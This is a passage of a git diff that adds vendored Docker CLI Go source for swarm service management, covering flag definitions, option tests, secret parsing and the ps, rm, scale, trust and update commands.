+	flagConstraint            = "constraint"
+	flagConstraintRemove      = "constraint-rm"
+	flagConstraintAdd         = "constraint-add"
+	flagContainerLabel        = "container-label"
+	flagContainerLabelRemove  = "container-label-rm"
+	flagContainerLabelAdd     = "container-label-add"
+	flagDNS                   = "dns"
+	flagDNSRemove             = "dns-rm"
+	flagDNSAdd                = "dns-add"
+	flagDNSOption             = "dns-option"
+	flagDNSOptionRemove       = "dns-option-rm"
+	flagDNSOptionAdd          = "dns-option-add"
+	flagDNSSearch             = "dns-search"
+	flagDNSSearchRemove       = "dns-search-rm"
+	flagDNSSearchAdd          = "dns-search-add"
+	flagEndpointMode          = "endpoint-mode"
+	flagHost                  = "host"
+	flagHostAdd               = "host-add"
+	flagHostRemove            = "host-rm"
+	flagHostname              = "hostname"
+	flagEnv                   = "env"
+	flagEnvFile               = "env-file"
+	flagEnvRemove             = "env-rm"
+	flagEnvAdd                = "env-add"
+	flagGroup                 = "group"
+	flagGroupAdd              = "group-add"
+	flagGroupRemove           = "group-rm"
+	flagLabel                 = "label"
+	flagLabelRemove           = "label-rm"
+	flagLabelAdd              = "label-add"
+	flagLimitCPU              = "limit-cpu"
+	flagLimitMemory           = "limit-memory"
+	flagMode                  = "mode"
+	flagMount                 = "mount"
+	flagMountRemove           = "mount-rm"
+	flagMountAdd              = "mount-add"
+	flagName                  = "name"
+	flagNetwork               = "network"
+	flagPublish               = "publish"
+	flagPublishRemove         = "publish-rm"
+	flagPublishAdd            = "publish-add"
+	flagReplicas              = "replicas"
+	flagReserveCPU            = "reserve-cpu"
+	flagReserveMemory         = "reserve-memory"
+	flagRestartCondition      = "restart-condition"
+	flagRestartDelay          = "restart-delay"
+	flagRestartMaxAttempts    = "restart-max-attempts"
+	flagRestartWindow         = "restart-window"
+	flagStopGracePeriod       = "stop-grace-period"
+	flagTTY                   = "tty"
+	flagUpdateDelay           = "update-delay"
+	flagUpdateFailureAction   = "update-failure-action"
+	flagUpdateMaxFailureRatio = "update-max-failure-ratio"
+	flagUpdateMonitor         = "update-monitor"
+	flagUpdateParallelism     = "update-parallelism"
+	flagUser                  = "user"
+	flagWorkdir               = "workdir"
+	flagRegistryAuth          = "with-registry-auth"
+	flagLogDriver             = "log-driver"
+	flagLogOpt                = "log-opt"
+	flagHealthCmd             = "health-cmd"
+	flagHealthInterval        = "health-interval"
+	flagHealthRetries         = "health-retries"
+	flagHealthTimeout         = "health-timeout"
+	flagNoHealthcheck         = "no-healthcheck"
+	flagSecret                = "secret"
+	flagSecretAdd             = "secret-add"
+	flagSecretRemove          = "secret-rm"
+)
diff --git a/vendor/github.com/docker/docker/cli/command/service/opts_test.go b/vendor/github.com/docker/docker/cli/command/service/opts_test.go
new file mode 100644
index 0000000000..78b956ad67
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/opts_test.go
@@ -0,0 +1,107 @@
+package service
+
+import (
+	"reflect"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestMemBytesString(t *testing.T) {
+	var mem memBytes = 1048576
+	assert.Equal(t, mem.String(), "1 MiB")
+}
+
+func TestMemBytesSetAndValue(t *testing.T) {
+	var mem memBytes
+	assert.NilError(t, mem.Set("5kb"))
+	assert.Equal(t, mem.Value(), int64(5120))
+}
+
+func TestNanoCPUsString(t *testing.T) {
+	var cpus opts.NanoCPUs = 6100000000
+	assert.Equal(t, cpus.String(), "6.100")
+}
+
+func TestNanoCPUsSetAndValue(t *testing.T) {
+	var cpus opts.NanoCPUs
+	assert.NilError(t, cpus.Set("0.35"))
+	assert.Equal(t, cpus.Value(), int64(350000000))
+}
+
+func TestDurationOptString(t *testing.T) {
+	dur := time.Duration(300 * 10e8)
+	duration := DurationOpt{value: &dur}
+	assert.Equal(t, duration.String(), "5m0s")
+}
+
+func TestDurationOptSetAndValue(t *testing.T) {
+	var duration DurationOpt
+	assert.NilError(t, duration.Set("300s"))
+	assert.Equal(t, *duration.Value(), time.Duration(300*10e8))
+	assert.NilError(t, duration.Set("-300s"))
+	assert.Equal(t, *duration.Value(), time.Duration(-300*10e8))
+}
+
+func TestPositiveDurationOptSetAndValue(t *testing.T) {
+	var duration PositiveDurationOpt
+	assert.NilError(t, duration.Set("300s"))
+	assert.Equal(t, *duration.Value(), time.Duration(300*10e8))
+	assert.Error(t, duration.Set("-300s"), "cannot be negative")
+}
+
+func TestUint64OptString(t *testing.T) {
+	value := uint64(2345678)
+	opt := Uint64Opt{value: &value}
+	assert.Equal(t, opt.String(), "2345678")
+
+	opt = Uint64Opt{}
+	assert.Equal(t, opt.String(), "")
+}
+
+func TestUint64OptSetAndValue(t *testing.T) {
+	var opt Uint64Opt
+	assert.NilError(t, opt.Set("14445"))
+	assert.Equal(t, *opt.Value(), uint64(14445))
+}
+
+func TestHealthCheckOptionsToHealthConfig(t *testing.T) {
+	dur := time.Second
+	opt := healthCheckOptions{
+		cmd:      "curl",
+		interval: PositiveDurationOpt{DurationOpt{value: &dur}},
+		timeout:  PositiveDurationOpt{DurationOpt{value: &dur}},
+		retries:  10,
+	}
+	config, err := opt.toHealthConfig()
+	assert.NilError(t, err)
+	assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{
+		Test:     []string{"CMD-SHELL", "curl"},
+		Interval: time.Second,
+		Timeout:  time.Second,
+		Retries:  10,
+	}), true)
+}
+
+func TestHealthCheckOptionsToHealthConfigNoHealthcheck(t *testing.T) {
+	opt := healthCheckOptions{
+		noHealthcheck: true,
+	}
+	config, err := opt.toHealthConfig()
+	assert.NilError(t, err)
+	assert.Equal(t, reflect.DeepEqual(config, &container.HealthConfig{
+		Test: []string{"NONE"},
+	}), true)
+}
+
+func TestHealthCheckOptionsToHealthConfigConflict(t *testing.T) {
+	opt := healthCheckOptions{
+		cmd:           "curl",
+		noHealthcheck: true,
+	}
+	_, err := opt.toHealthConfig()
+	assert.Error(t, err, "--no-healthcheck conflicts with --health-* options")
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/parse.go b/vendor/github.com/docker/docker/cli/command/service/parse.go
new file mode 100644
index 0000000000..ce9b454edd
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/parse.go
@@ -0,0 +1,68 @@
+package service
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/client"
+	"golang.org/x/net/context"
+)
+
+// ParseSecrets retrieves the secrets from the requested names and converts
+// them to secret references to use with the spec
+func ParseSecrets(client client.SecretAPIClient, requestedSecrets []*types.SecretRequestOption) ([]*swarmtypes.SecretReference, error) {
+	secretRefs := make(map[string]*swarmtypes.SecretReference)
+	ctx := context.Background()
+
+	for _, secret := range requestedSecrets {
+		if _, exists := secretRefs[secret.Target]; exists {
+			return nil, fmt.Errorf("duplicate secret target for %s not allowed", secret.Source)
+		}
+		secretRef := &swarmtypes.SecretReference{
+			File: &swarmtypes.SecretReferenceFileTarget{
+				Name: secret.Target,
+				UID:  secret.UID,
+				GID:  secret.GID,
+				Mode: secret.Mode,
+			},
+			SecretName: secret.Source,
+		}
+
+		secretRefs[secret.Target] = secretRef
+	}
+
+	args := filters.NewArgs()
+	for _, s := range secretRefs {
+		args.Add("names", s.SecretName)
+	}
+
+	secrets, err := client.SecretList(ctx, types.SecretListOptions{
+		Filters: args,
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	foundSecrets := make(map[string]string)
+	for _, secret := range secrets {
+		foundSecrets[secret.Spec.Annotations.Name] = secret.ID
+	}
+
+	addedSecrets := []*swarmtypes.SecretReference{}
+
+	for _, ref := range secretRefs {
+		id, ok := foundSecrets[ref.SecretName]
+		if !ok {
+			return nil, fmt.Errorf("secret not found: %s", ref.SecretName)
+		}
+
+		// set the id for the ref to properly assign in swarm
+		// since swarm needs the ID instead of the name
+		ref.SecretID = id
+		addedSecrets = append(addedSecrets, ref)
+	}
+
+	return addedSecrets, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/ps.go b/vendor/github.com/docker/docker/cli/command/service/ps.go
new file mode 100644
index 0000000000..cf94ad7374
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/ps.go
@@ -0,0 +1,76 @@
+package service
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/idresolver"
+	"github.com/docker/docker/cli/command/node"
+	"github.com/docker/docker/cli/command/task"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+type psOptions struct {
+	serviceID string
+	quiet     bool
+	noResolve bool
+	noTrunc   bool
+	filter    opts.FilterOpt
+}
+
+func newPsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := psOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "ps [OPTIONS] SERVICE",
+		Short: "List the tasks of a service",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.serviceID = args[0]
+			return runPS(dockerCli, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display task IDs")
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output")
+	flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func runPS(dockerCli *command.DockerCli, opts psOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	service, _, err := client.ServiceInspectWithRaw(ctx, opts.serviceID)
+	if err != nil {
+		return err
+	}
+
+	filter := opts.filter.Value()
+	filter.Add("service", service.ID)
+	if filter.Include("node") {
+		nodeFilters := filter.Get("node")
+		for _, nodeFilter := range nodeFilters {
+			nodeReference, err := node.Reference(ctx, client, nodeFilter)
+			if err != nil {
+				return err
+			}
+			filter.Del("node", nodeFilter)
+			filter.Add("node", nodeReference)
+		}
+	}
+
+	tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter})
+	if err != nil {
+		return err
+	}
+
+	if opts.quiet {
+		return task.PrintQuiet(dockerCli, tasks)
+	}
+	return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/remove.go b/vendor/github.com/docker/docker/cli/command/service/remove.go
new file mode 100644
index 0000000000..c3fbbabbca
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/remove.go
@@ -0,0 +1,47 @@
+package service
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+	"golang.org/x/net/context"
+)
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+
+	cmd := &cobra.Command{
+		Use:     "rm SERVICE [SERVICE...]",
+		Aliases: []string{"remove"},
+		Short:   "Remove one or more services",
+		Args:    cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runRemove(dockerCli, args)
+		},
+	}
+	cmd.Flags()
+
+	return cmd
+}
+
+func runRemove(dockerCli *command.DockerCli, sids []string) error {
+	client := dockerCli.Client()
+
+	ctx := context.Background()
+
+	var errs []string
+	for _, sid := range sids {
+		err := client.ServiceRemove(ctx, sid)
+		if err != nil {
+			errs = append(errs, err.Error())
+			continue
+		}
+		fmt.Fprintf(dockerCli.Out(), "%s\n", sid)
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf(strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/scale.go b/vendor/github.com/docker/docker/cli/command/service/scale.go
new file mode 100644
index 0000000000..cf89e90273
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/scale.go
@@ -0,0 +1,96 @@
+package service
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+func newScaleCommand(dockerCli *command.DockerCli) *cobra.Command {
+	return &cobra.Command{
+		Use:   "scale SERVICE=REPLICAS [SERVICE=REPLICAS...]",
+		Short: "Scale one or multiple replicated services",
+		Args:  scaleArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runScale(dockerCli, args)
+		},
+	}
+}
+
+func scaleArgs(cmd *cobra.Command, args []string) error {
+	if err := cli.RequiresMinArgs(1)(cmd, args); err != nil {
+		return err
+	}
+	for _, arg := range args {
+		if parts := strings.SplitN(arg, "=", 2); len(parts) != 2 {
+			return fmt.Errorf(
+				"Invalid scale specifier '%s'.\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
+				arg,
+				cmd.CommandPath(),
+				cmd.UseLine(),
+				cmd.Short,
+			)
+		}
+	}
+	return nil
+}
+
+func runScale(dockerCli *command.DockerCli, args []string) error {
+	var errors []string
+	for _, arg := range args {
+		parts := strings.SplitN(arg, "=", 2)
+		serviceID, scaleStr := parts[0], parts[1]
+
+		// validate input arg scale number
+		scale, err := strconv.ParseUint(scaleStr, 10, 64)
+		if err != nil {
+			errors = append(errors, fmt.Sprintf("%s: invalid replicas value %s: %v", serviceID, scaleStr, err))
+			continue
+		}
+
+		if err := runServiceScale(dockerCli, serviceID, scale); err != nil {
+			errors = append(errors, fmt.Sprintf("%s: %v", serviceID, err))
+		}
+	}
+
+	if len(errors) == 0 {
+		return nil
+	}
+	return fmt.Errorf(strings.Join(errors, "\n"))
+}
+
+func runServiceScale(dockerCli *command.DockerCli, serviceID string, scale uint64) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	service, _, err := client.ServiceInspectWithRaw(ctx, serviceID)
+	if err != nil {
+		return err
+	}
+
+	serviceMode := &service.Spec.Mode
+	if serviceMode.Replicated == nil {
+		return fmt.Errorf("scale can only be used with replicated mode")
+	}
+
+	serviceMode.Replicated.Replicas = &scale
+
+	response, err := client.ServiceUpdate(ctx, service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{})
+	if err != nil {
+		return err
+	}
+
+	for _, warning := range response.Warnings {
+		fmt.Fprintln(dockerCli.Err(), warning)
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "%s scaled to %d\n", serviceID, scale)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/trust.go b/vendor/github.com/docker/docker/cli/command/service/trust.go
new file mode 100644
index 0000000000..052d49c32a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/trust.go
@@ -0,0 +1,96 @@
+package service
+
+import (
+	"encoding/hex"
+	"fmt"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/trust"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/docker/notary/tuf/data"
+	"github.com/pkg/errors"
+	"golang.org/x/net/context"
+)
+
+func resolveServiceImageDigest(dockerCli *command.DockerCli, service *swarm.ServiceSpec) error {
+	if !command.IsTrusted() {
+		// Digests are resolved by the daemon when not using content
+		// trust.
+		return nil
+	}
+
+	image := service.TaskTemplate.ContainerSpec.Image
+
+	// We only attempt to resolve the digest if the reference
+	// could be parsed as a digest reference. Specifying an image ID
+	// is valid but not resolvable. There is no warning message for
+	// an image ID because it's valid to use one.
+	if _, err := digest.ParseDigest(image); err == nil {
+		return nil
+	}
+
+	ref, err := reference.ParseNamed(image)
+	if err != nil {
+		return fmt.Errorf("Could not parse image reference %s", service.TaskTemplate.ContainerSpec.Image)
+	}
+	if _, ok := ref.(reference.Canonical); !ok {
+		ref = reference.WithDefaultTag(ref)
+
+		taggedRef, ok := ref.(reference.NamedTagged)
+		if !ok {
+			// This should never happen because a reference either
+			// has a digest, or WithDefaultTag would give it a tag.
+			return errors.New("Failed to resolve image digest using content trust: reference is missing a tag")
+		}
+
+		resolvedImage, err := trustedResolveDigest(context.Background(), dockerCli, taggedRef)
+		if err != nil {
+			return fmt.Errorf("Failed to resolve image digest using content trust: %v", err)
+		}
+		logrus.Debugf("resolved image tag to %s using content trust", resolvedImage.String())
+		service.TaskTemplate.ContainerSpec.Image = resolvedImage.String()
+	}
+	return nil
+}
+
+func trustedResolveDigest(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged) (distreference.Canonical, error) {
+	repoInfo, err := registry.ParseRepositoryInfo(ref)
+	if err != nil {
+		return nil, err
+	}
+
+	authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index)
+
+	notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull")
+	if err != nil {
+		return nil, errors.Wrap(err, "error establishing connection to trust repository")
+	}
+
+	t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole)
+	if err != nil {
+		return nil, trust.NotaryError(repoInfo.FullName(), err)
+	}
+	// Only get the tag if it's in the top level targets role or the releases delegation role
+	// ignore it if it's in any other delegation roles
+	if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole {
+		return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.String()))
+	}
+
+	logrus.Debugf("retrieving target for %s role\n", t.Role)
+	h, ok := t.Hashes["sha256"]
+	if !ok {
+		return nil, errors.New("no valid hash, expecting sha256")
+	}
+
+	dgst := digest.NewDigestFromHex("sha256", hex.EncodeToString(h))
+
+	// Using distribution reference package to make sure that adding a
+	// digest does not erase the tag. When the two reference packages
+	// are unified, this will no longer be an issue.
+	return distreference.WithDigest(ref, dgst)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/service/update.go b/vendor/github.com/docker/docker/cli/command/service/update.go
new file mode 100644
index 0000000000..d56de10913
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/service/update.go
@@ -0,0 +1,849 @@
+package service
+
+import (
+	"fmt"
+	"sort"
+	"strings"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-connections/nat"
+	shlex "github.com/flynn-archive/go-shlex"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	serviceOpts := newServiceOptions()
+
+	cmd := &cobra.Command{
+		Use:   "update [OPTIONS] SERVICE",
+		Short: "Update a service",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runUpdate(dockerCli, cmd.Flags(), args[0])
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.String("image", "", "Service image tag")
+	flags.String("args", "", "Service command args")
+	flags.Bool("rollback", false, "Rollback to previous specification")
+	flags.Bool("force", false, "Force update even if no changes require it")
+	addServiceFlags(cmd, serviceOpts)
+
+	flags.Var(newListOptsVar(), flagEnvRemove, "Remove an environment variable")
+	flags.Var(newListOptsVar(), flagGroupRemove, "Remove a previously added supplementary user group from the container")
+	flags.Var(newListOptsVar(), flagLabelRemove, "Remove a label by its key")
+	flags.Var(newListOptsVar(), flagContainerLabelRemove, "Remove a container label by its key")
+	flags.Var(newListOptsVar(), flagMountRemove, "Remove a mount by its target path")
+	// flags.Var(newListOptsVar().WithValidator(validatePublishRemove), flagPublishRemove, "Remove a published port by its target port")
+	flags.Var(&opts.PortOpt{}, flagPublishRemove, "Remove a published port by its target port")
+	flags.Var(newListOptsVar(), flagConstraintRemove, "Remove a constraint")
+	flags.Var(newListOptsVar(), flagDNSRemove, "Remove a custom DNS server")
+	flags.Var(newListOptsVar(), flagDNSOptionRemove, "Remove a DNS option")
+	flags.Var(newListOptsVar(), flagDNSSearchRemove, "Remove a DNS search domain")
+	flags.Var(newListOptsVar(), flagHostRemove, "Remove a custom host-to-IP mapping (host:ip)")
+	flags.Var(&serviceOpts.labels, flagLabelAdd, "Add or update a service label")
+	flags.Var(&serviceOpts.containerLabels, flagContainerLabelAdd, "Add or update a container label")
+	flags.Var(&serviceOpts.env, flagEnvAdd, "Add or update an environment variable")
+	flags.Var(newListOptsVar(), flagSecretRemove, "Remove a secret")
+	flags.Var(&serviceOpts.secrets, flagSecretAdd, "Add or update a secret on a service")
+	flags.Var(&serviceOpts.mounts, flagMountAdd, "Add or update a mount on a service")
+	flags.Var(&serviceOpts.constraints, flagConstraintAdd, "Add or update a placement constraint")
+	flags.Var(&serviceOpts.endpoint.publishPorts, flagPublishAdd, "Add or update a published port")
+	flags.Var(&serviceOpts.groups, flagGroupAdd, "Add an additional supplementary user group to the container")
+	flags.Var(&serviceOpts.dns, flagDNSAdd, "Add or update a custom DNS server")
+	flags.Var(&serviceOpts.dnsOption, flagDNSOptionAdd, "Add or update a DNS option")
+	flags.Var(&serviceOpts.dnsSearch, flagDNSSearchAdd, "Add or update a custom DNS search domain")
+	flags.Var(&serviceOpts.hosts, flagHostAdd, "Add or update a custom host-to-IP mapping (host:ip)")
+
+	return cmd
+}
+
+func newListOptsVar() *opts.ListOpts {
+	return opts.NewListOptsRef(&[]string{}, nil)
+}
+
+func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, serviceID string) error {
+	apiClient := dockerCli.Client()
+	ctx := context.Background()
+	updateOpts := types.ServiceUpdateOptions{}
+
+	service, _, err := apiClient.ServiceInspectWithRaw(ctx, serviceID)
+	if err != nil {
+		return err
+	}
+
+	rollback, err := flags.GetBool("rollback")
+	if err != nil {
+		return err
+	}
+
+	spec := &service.Spec
+	if rollback {
+		spec = service.PreviousSpec
+		if spec == nil {
+			return fmt.Errorf("service does not have a previous specification to roll back to")
+		}
+	}
+
+	err = updateService(flags, spec)
+	if err != nil {
+		return err
+	}
+
+	if flags.Changed("image") {
+		if err := resolveServiceImageDigest(dockerCli, spec); err != nil {
+			return err
+		}
+	}
+
+	updatedSecrets, err := getUpdatedSecrets(apiClient, flags, spec.TaskTemplate.ContainerSpec.Secrets)
+	if err != nil {
+		return err
+	}
+
+	spec.TaskTemplate.ContainerSpec.Secrets = updatedSecrets
+
+	// only send auth if flag was set
+	sendAuth, err := flags.GetBool(flagRegistryAuth)
+	if err != nil {
+		return err
+	}
+	if sendAuth {
+		// Retrieve encoded auth token from the image reference
+		// This would be the old image if it didn't change in this update
+		image := spec.TaskTemplate.ContainerSpec.Image
+		encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, image)
+		if err != nil {
+			return err
+		}
+		updateOpts.EncodedRegistryAuth = encodedAuth
+	} else if rollback {
+		updateOpts.RegistryAuthFrom = types.RegistryAuthFromPreviousSpec
+	} else {
+		updateOpts.RegistryAuthFrom = types.RegistryAuthFromSpec
+	}
+
+	response, err := apiClient.ServiceUpdate(ctx, service.ID, service.Version, *spec, updateOpts)
+	if err != nil {
+		return err
+	}
+
+	for _, warning := range response.Warnings {
+		fmt.Fprintln(dockerCli.Err(), warning)
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "%s\n", serviceID)
+	return nil
+}
+
+func updateService(flags *pflag.FlagSet, spec *swarm.ServiceSpec) error {
+	updateString := func(flag string, field *string) {
+		if flags.Changed(flag) {
+			*field, _ = flags.GetString(flag)
+		}
+	}
+
+	updateInt64Value := func(flag string, field *int64) {
+		if flags.Changed(flag) {
+			*field = flags.Lookup(flag).Value.(int64Value).Value()
+		}
+	}
+
+	updateFloatValue := func(flag string, field *float32) {
+		if flags.Changed(flag) {
+			*field = flags.Lookup(flag).Value.(*floatValue).Value()
+		}
+	}
+
+	updateDuration := func(flag string, field *time.Duration) {
+		if flags.Changed(flag) {
+			*field, _ = flags.GetDuration(flag)
+		}
+	}
+
+	updateDurationOpt := func(flag string, field **time.Duration) {
+		if flags.Changed(flag) {
+			val := *flags.Lookup(flag).Value.(*DurationOpt).Value()
+			*field = &val
+		}
+	}
+
+	updateUint64 := func(flag string, field *uint64) {
+		if flags.Changed(flag) {
+			*field, _ = flags.GetUint64(flag)
+		}
+	}
+
+	updateUint64Opt := func(flag string, field **uint64) {
+		if flags.Changed(flag) {
+			val := *flags.Lookup(flag).Value.(*Uint64Opt).Value()
+			*field = &val
+		}
+	}
+
+	cspec := &spec.TaskTemplate.ContainerSpec
+	task := &spec.TaskTemplate
+
+	taskResources := func() *swarm.ResourceRequirements {
+		if task.Resources == nil {
+			task.Resources = &swarm.ResourceRequirements{}
+		}
+		return task.Resources
+	}
+
+	updateLabels(flags, &spec.Labels)
+	updateContainerLabels(flags, &cspec.Labels)
+	updateString("image", &cspec.Image)
+	updateStringToSlice(flags, "args", &cspec.Args)
+	updateEnvironment(flags, &cspec.Env)
+	updateString(flagWorkdir, &cspec.Dir)
+	updateString(flagUser, &cspec.User)
+	updateString(flagHostname, &cspec.Hostname)
+	if err := updateMounts(flags, &cspec.Mounts); err != nil {
+		return err
+	}
+
+	if flags.Changed(flagLimitCPU) || flags.Changed(flagLimitMemory) {
+		taskResources().Limits = &swarm.Resources{}
+		updateInt64Value(flagLimitCPU, &task.Resources.Limits.NanoCPUs)
+		updateInt64Value(flagLimitMemory, &task.Resources.Limits.MemoryBytes)
+	}
+	if flags.Changed(flagReserveCPU) || flags.Changed(flagReserveMemory) {
+		taskResources().Reservations = &swarm.Resources{}
+		updateInt64Value(flagReserveCPU, &task.Resources.Reservations.NanoCPUs)
+		updateInt64Value(flagReserveMemory, &task.Resources.Reservations.MemoryBytes)
+	}
+
+	updateDurationOpt(flagStopGracePeriod, &cspec.StopGracePeriod)
+
+	if anyChanged(flags, flagRestartCondition, flagRestartDelay, flagRestartMaxAttempts, flagRestartWindow) {
+		if task.RestartPolicy == nil {
+			task.RestartPolicy = &swarm.RestartPolicy{}
+		}
+
+		if flags.Changed(flagRestartCondition) {
+			value, _ := flags.GetString(flagRestartCondition)
+			task.RestartPolicy.Condition = swarm.RestartPolicyCondition(value)
+		}
+		updateDurationOpt(flagRestartDelay, &task.RestartPolicy.Delay)
+		updateUint64Opt(flagRestartMaxAttempts, &task.RestartPolicy.MaxAttempts)
+		updateDurationOpt(flagRestartWindow, &task.RestartPolicy.Window)
+	}
+
+	if anyChanged(flags, flagConstraintAdd, flagConstraintRemove) {
+		if task.Placement == nil {
+			task.Placement = &swarm.Placement{}
+		}
+		updatePlacement(flags, task.Placement)
+	}
+
+	if err := updateReplicas(flags, &spec.Mode); err != nil {
+		return err
+	}
+
+	if anyChanged(flags, flagUpdateParallelism, flagUpdateDelay, flagUpdateMonitor, flagUpdateFailureAction, flagUpdateMaxFailureRatio) {
+		if spec.UpdateConfig == nil {
+			spec.UpdateConfig = &swarm.UpdateConfig{}
+		}
+		updateUint64(flagUpdateParallelism, &spec.UpdateConfig.Parallelism)
+		updateDuration(flagUpdateDelay, &spec.UpdateConfig.Delay)
+		updateDuration(flagUpdateMonitor, &spec.UpdateConfig.Monitor)
+		updateString(flagUpdateFailureAction, &spec.UpdateConfig.FailureAction)
+		updateFloatValue(flagUpdateMaxFailureRatio, &spec.UpdateConfig.MaxFailureRatio)
+	}
+
+	if flags.Changed(flagEndpointMode) {
+		value, _ := flags.GetString(flagEndpointMode)
+		if spec.EndpointSpec == nil {
+			spec.EndpointSpec = &swarm.EndpointSpec{}
+		}
+		spec.EndpointSpec.Mode = swarm.ResolutionMode(value)
+	}
+
+	if anyChanged(flags, flagGroupAdd, flagGroupRemove) {
+		if err := updateGroups(flags, &cspec.Groups); err != nil {
+			return err
+		}
+	}
+
+	if anyChanged(flags, flagPublishAdd, flagPublishRemove) {
+		if spec.EndpointSpec == nil {
+			spec.EndpointSpec = &swarm.EndpointSpec{}
+		}
+		if err := updatePorts(flags, &spec.EndpointSpec.Ports); err != nil {
+			return err
+		}
+	}
+
+	if anyChanged(flags, flagDNSAdd, flagDNSRemove, flagDNSOptionAdd, flagDNSOptionRemove, flagDNSSearchAdd, flagDNSSearchRemove) {
+		if cspec.DNSConfig == nil {
+			cspec.DNSConfig = &swarm.DNSConfig{}
+		}
+		if err := updateDNSConfig(flags, &cspec.DNSConfig); err != nil {
+			return err
+		}
+	}
+
+	if anyChanged(flags, flagHostAdd, flagHostRemove) {
+		if err := updateHosts(flags, &cspec.Hosts); err != nil {
+			return err
+		}
+	}
+
+	if err := updateLogDriver(flags, &spec.TaskTemplate); err != nil {
+		return err
+	}
+
+	force, err := flags.GetBool("force")
+	if err != nil {
+		return err
+	}
+
+	if force {
+		spec.TaskTemplate.ForceUpdate++
+	}
+
+	if err := updateHealthcheck(flags, cspec); err != nil {
+		return err
+	}
+
+	if flags.Changed(flagTTY) {
+		tty, err := flags.GetBool(flagTTY)
+		if err != nil {
+			return err
+		}
+		cspec.TTY = tty
+	}
+
+	return nil
+}
+
+func updateStringToSlice(flags *pflag.FlagSet, flag string, field *[]string) error {
+	if !flags.Changed(flag) {
+		return nil
+	}
+
+	value, _ := flags.GetString(flag)
+	valueSlice, err := shlex.Split(value)
+	*field = valueSlice
+	return err
+}
+
+func anyChanged(flags *pflag.FlagSet, fields ...string) bool {
+	for _, flag := range fields {
+		if flags.Changed(flag) {
+			return true
+		}
+	}
+	return false
+}
+
